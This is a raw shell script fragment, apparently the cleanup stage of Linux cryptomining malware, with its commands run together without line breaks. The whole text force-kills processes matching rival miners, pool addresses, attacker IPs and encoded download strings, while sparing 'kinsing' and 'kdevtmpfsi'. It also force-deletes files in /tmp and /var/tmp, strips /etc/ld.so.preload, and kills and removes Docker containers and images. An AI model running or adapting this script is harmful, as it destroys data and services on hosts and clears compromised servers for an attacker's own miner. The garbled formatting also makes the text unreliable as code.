'{print $1}' | xargs -I % kill -9 %netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep "207.38.87.6" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep "34.81.218.76:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep "42.112.28.216:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %pkill -f .git/kthreaddwps aux | grep "agetty" | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %pkill -f 42.112.28.216
netstat -anp | grep "127.0.0.1:52018" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %cat /tmp/.X11-unix/01|xargs -I % kill -9 %cat /tmp/.X11-unix/11|xargs -I % kill -9 %cat /tmp/.X11-unix/22|xargs -I % kill -9 %cat /tmp/.pg_stat.0|xargs -I % kill -9 %cat /tmp/.pg_stat.1|xargs -I % kill -9 %cat $HOME/data/./oka.pid|xargs -I % kill -9 %pkill -f 80.211.206.105pkill -f 207.38.87.6pkill -f p8444pkill -f supportxmrpkill -f moneropkill -f zsvcpkill -f pdefenderdpkill -f updatecheckerdpkill -f crunerpkill -f dbusedpkill -f bashircpkill -f meminitsrvpkill -f kthreaddipkill -f srv00pkill -f /tmp/.javae/javaepkill -f .javaepkill -f .synapkill -f .mainpkill -f xmmpkill -f solr.shpkill -f /tmp/.solr/solrdpkill -f /tmp/javacpkill -f /tmp/.go.shpkill -f /tmp/.x/agettypkill -f /tmp/.x/kworkerpkill -f c3poolpkill -f /tmp/.X11-unix/gitag-sshpkill -f /tmp/1pkill -f /tmp/okk.shpkill -f /tmp/gitalypkill -f /tmp/.x/kworkerpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBpkill -f /tmp/.X11-unix/supervisepkill -f /tmp/.ssh/redis.shps aux| grep "./udp"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %ps aux| grep "./oka"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %ps aux| grep "postgres: autovacum"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %ps ax -o command,pid -www| awk 'length($1) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey|grep -v kinsing| awk '{print $2}'|xargs -I % kill -9 %ps ax -o command,pid -www| awk 'length($1) == 16'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $2}'|xargs -I % kill -9 %ps ax| awk 'length($5) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $1}'|xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/sscks' | awk '{print $2}' | xargs -I % kill -9 %ps aux| grep "sleep 60"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %ps aux| grep "./crun"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -vw kdevtmpfsi | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi|grep -v postgresq1 | awk '$3>80.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %systemctl stop c3pool_miner.servicepkill -f pastebinpkill -f ssh-agentpkill -f 185.193.127.115pgrep -f monerohash | xargs -I % kill -9 %pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %pgrep -f xzpauectgr | xargs -I % kill -9 %pgrep -f slxfbkmxtd | xargs -I % kill -9 %pgrep -f mixtape | xargs -I % kill -9 %pgrep -f addnj | xargs -I % kill -9 %pgrep -f 200.68.17.196 | xargs -I % kill -9 %pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %pgrep -f honvbsasbf.conf | xargs -I % kill -9 %pgrep -f mqdsflm.cf | xargs -I % kill -9 %pgrep -f stratum | xargs -I % kill -9 %pgrep -f lower.sh | xargs -I % kill -9 %pgrep -f ./ppp | xargs -I % kill -9 %pgrep -f cryptonight | xargs -I % kill -9 %pgrep -f ./seervceaess | xargs -I % kill -9 %pgrep -f ./servceaess | xargs -I % kill -9 %pgrep -f ./servceas | xargs -I % kill -9 %pgrep -f ./servcesa | xargs -I % kill -9 %pgrep -f ./vsp | xargs -I % kill -9 %pgrep -f ./jvs | xargs -I % kill -9 %pgrep -f ./pvv | xargs -I % kill -9 %pgrep -f ./vpp | xargs -I % kill -9 %pgrep -f ./pces | xargs -I % kill -9 %pgrep -f ./rspce | xargs -I % kill -9 %pgrep -f ./haveged | xargs -I % kill -9 %pgrep -f ./jiba | xargs -I % kill -9 %pgrep -f ./watchbog | xargs -I % kill -9 %pgrep -f ./A7mA5gb | xargs -I % kill -9 %pgrep -f kacpi_svc | xargs -I % kill -9 %pgrep -f kswap_svc | xargs -I % kill -9 %pgrep -f kauditd_svc | xargs -I % kill -9 %pgrep -f kpsmoused_svc | xargs -I % kill -9 %pgrep -f kseriod_svc | xargs -I % kill -9 %pgrep -f kthreadd_svc | xargs -I % kill -9 %pgrep -f ksoftirqd_svc | xargs -I % kill -9 %pgrep -f kintegrityd_svc | xargs -I % kill -9 %pgrep -f jawa | xargs -I % kill -9 %pgrep -f oracle.jpg | xargs -I % kill -9 %pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %pgrep -f 188.209.49.54 | xargs -I % kill -9 %pgrep -f 181.214.87.241 | xargs -I % kill -9 %pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %pgrep -f servim | xargs -I % kill -9 %pgrep -f kblockd_svc | xargs -I % kill -9 %pgrep -f native_svc | xargs -I % kill -9 %pgrep -f ynn | xargs -I % kill -9 %pgrep -f 65ccEJ7 | xargs -I % kill -9 %pgrep -f jmxx | xargs -I % kill -9 %pgrep -f 2Ne80nA | xargs -I % kill -9 %pgrep -f sysstats | xargs -I % kill -9 %pgrep -f systemxlv | xargs -I % kill -9 %pgrep -f watchbog | xargs -I % kill -9 %pgrep -f OIcJi1m | xargs -I % kill -9 %pkill -f biosetjenkinspkill -f Loopbackpkill -f apacehapkill -f cryptonightpkill -f stratumpkill -f mixnerdxpkill -f performedlpkill -f JnKihGjnpkill -f irqba2anc1pkill -f irqba5xnc1pkill -f irqbnc1pkill -f ir29xc1pkill -f connspkill -f irqbalancepkill -f crypto-poolpkill -f XJnRjpkill -f mgwslpkill -f pythnopkill -f jweripkill -f lx26pkill -f NXLAipkill -f BI5zjpkill -f askdljlqwpkill -f minerdpkill -f minergatepkill -f Guard.shpkill -f ysaydhpkill -f bonnspkill -f donnspkill -f kxjdpkill -f Duck.shpkill -f bonn.shpkill -f conn.shpkill -f kworker34pkill -f kw.shpkill -f pro.shpkill -f polkitdpkill -f acpidpkill -f icb5opkill -f nopxipkill -f irqbalanc1pkill -f minerdpkill -f i586pkill -f gddrpkill -f mstxmrpkill -f ddg.2011pkill -f wnTKYgpkill -f deamonpkill -f disk_geniuspkill -f sourplumpkill -f polkitdpkill -f nanoWatchpkill -f zigwpkill -f devtoolpkill -f devtoolspkill -f systemctIpkill -f watchbogpkill -f cryptonightpkill -f sustespkill -f xmrigpkill -f xmrig-cpupkill -f 121.42.151.137pkill -f sysguardpkill -f networkservicepkill -f sysupdatepkill -f phpguardpkill -f phpupdatepkill -f networkmanagerpkill -f /tmp/init12.cfgpkill -f kieuanilam.mepkill -f init12.cfgpkill -f nginxkpkill -f tmp/wc.confpkill -f xmrig-notlspkill -f xmr-stakpkill -f suppoiepkill -f zer0day.rupkill -f dbus-daemon--systempkill -f nullcrewpkill -f systemctIpkill -f kworkerdspkill -f init10.cfgpkill -f /wl.confpkill -f crond64pkill -f sustsepkill -f vmlinuzpkill -f exinpkill -f apachiiirm -rf /usr/bin/config.jsonrm -rf /usr/bin/exinkillall log_rotpkill -f log_rotrm -rf /tmp/wc.confrm -rf /tmp/log_rotrm -rf /tmp/apachiiirm -rf /tmp/sustserm -rf /tmp/phprm -rf /tmp/p2.confrm -rf /tmp/pprtrm -rf /tmp/ppolrm -rf /tmp/javax/config.shrm -rf /tmp/javax/sshd2rm -rf /tmp/.profilerm -rf /tmp/1.sorm -rf /tmp/kworkerdsrm -rf /tmp/kworkerds3rm -rf /tmp/kworkerdssxrm -rf /tmp/xd.jsonrm -rf /tmp/syslogdrm -rf /tmp/syslogdbrm -rf /tmp/65ccEJ7rm -rf /tmp/jmxxrm -rf /tmp/2Ne80nArm -rf /tmp/dlrm -rf /tmp/ddgrm -rf /tmp/systemxlvrm -rf /tmp/systemctIrm -rf /tmp/.abcrm -rf /tmp/osw.hbrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/.javarm -rf /tmp/.omedrm -rf /tmp/.tmpcrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/gates.lodrm -rf /tmp/conf.nrm -rf /tmp/update.shrm -rf /tmp/devtoolrm -rf /tmp/devtoolsrm -rf /tmp/fsrm -rf /tmp/.rodrm -rf /tmp/.rod.tgzrm -rf /tmp/.rod.tgz.1rm -rf /tmp/.rod.tgz.2rm -rf /tmp/.merrm -rf /tmp/.mer.tgzrm -rf /tmp/.mer.tgz.1rm -rf /tmp/.hodrm -rf /tmp/.hod.tgzrm -rf /tmp/.hod.tgz.1rm -rf /tmp/84Onmcerm -rf /tmp/C4iLM4Lrm -rf /tmp/lilpiprm -rf /tmp/3lmigMorm -rf /tmp/am8jmBPrm -rf /tmp/tmp.txtrm -rf /tmp/babyrm -rf /tmp/.librm -rf /tmp/systemdrm -rf /tmp/lib.tar.gzrm -rf /tmp/babyrm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.mynews1234rm -rf /tmp/a3e12drm -rf /tmp/.ptrm -rf /tmp/.pt.tgzrm -rf /tmp/.pt.tgz.1rm -rf /tmp/gorm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.tmpnewasssrm -rf /tmp/javarm -rf /tmp/go.shrm -rf /tmp/go2.shrm -rf /tmp/khugepagedsrm -rf /tmp/.censusqqqqqqqqqrm -rf /tmp/.kerberodsrm -rf /tmp/kerberodsrm -rf /tmp/seasamerm -rf /tmp/touchrm -rf /tmp/.prm -rf /tmp/runtime2.shrm -rf /tmp/runtime.shrm -rf /dev/shm/z3.shrm -rf /dev/shm/z2.shrm -rf /dev/shm/.scrrm -rf /dev/shm/.kerberodsrm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sochattr -i /etc/ld.so.preloadrm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sorm -rf /tmp/watchdogsrm -rf /etc/cron.d/tomcatrm -rf /etc/rc.d/init.d/watchdogsrm -rf /usr/sbin/watchdogsrm -f /tmp/kthrotldsrm -f /etc/rc.d/init.d/kthrotldsrm -rf /tmp/.sysbabyuuuuu12rm -rf /tmp/logo9.jpgrm -rf /tmp/miner.shrm -rf /tmp/nullcrewrm -rf /tmp/procrm -rf /tmp/2.shrm /opt/atlassian/confluence/bin/1.shrm /opt/atlassian/confluence/bin/1.sh.1rm /opt/atlassian/confluence/bin/1.sh.2rm /opt/atlassian/confluence/bin/1.sh.3rm /opt/atlassian/confluence/bin/3.shrm /opt/atlassian/confluence/bin/3.sh.1rm /opt/atlassian/confluence/bin/3.sh.2rm /opt/atlassian/confluence/bin/3.sh.3rm -rf /var/tmp/f41rm -rf /var/tmp/2.shrm -rf /var/tmp/config.jsonrm -rf /var/tmp/xmrigrm -rf /var/tmp/1.sorm -rf /var/tmp/kworkerds3rm -rf /var/tmp/kworkerdssxrm -rf /var/tmp/kworkerdsrm -rf /var/tmp/wc.confrm -rf /var/tmp/nadezhda.rm -rf /var/tmp/nadezhda.armrm -rf /var/tmp/nadezhda.arm.1rm -rf /var/tmp/nadezhda.arm.2rm -rf /var/tmp/nadezhda.x86_64rm -rf /var/tmp/nadezhda.x86_64.1rm -rf /var/tmp/nadezhda.x86_64.2rm -rf /var/tmp/sustse3rm -rf /var/tmp/sustserm -rf /var/tmp/moneroocean/rm -rf /var/tmp/devtoolrm -rf /var/tmp/devtoolsrm -rf /var/tmp/play.shrm -rf /var/tmp/systemctIrm -rf /var/tmp/update.shrm -rf /var/tmp/.javarm -rf /var/tmp/1.shrm -rf /var/tmp/conf.nrm -r /var/tmp/librm -r /var/tmp/.librm -rf /tmp/config.jsonchattr -iau /tmp/lokchmod +700 /tmp/lokrm -rf /tmp/lok#yum install -y docker.io || apt-get install docker.io;docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %docker images 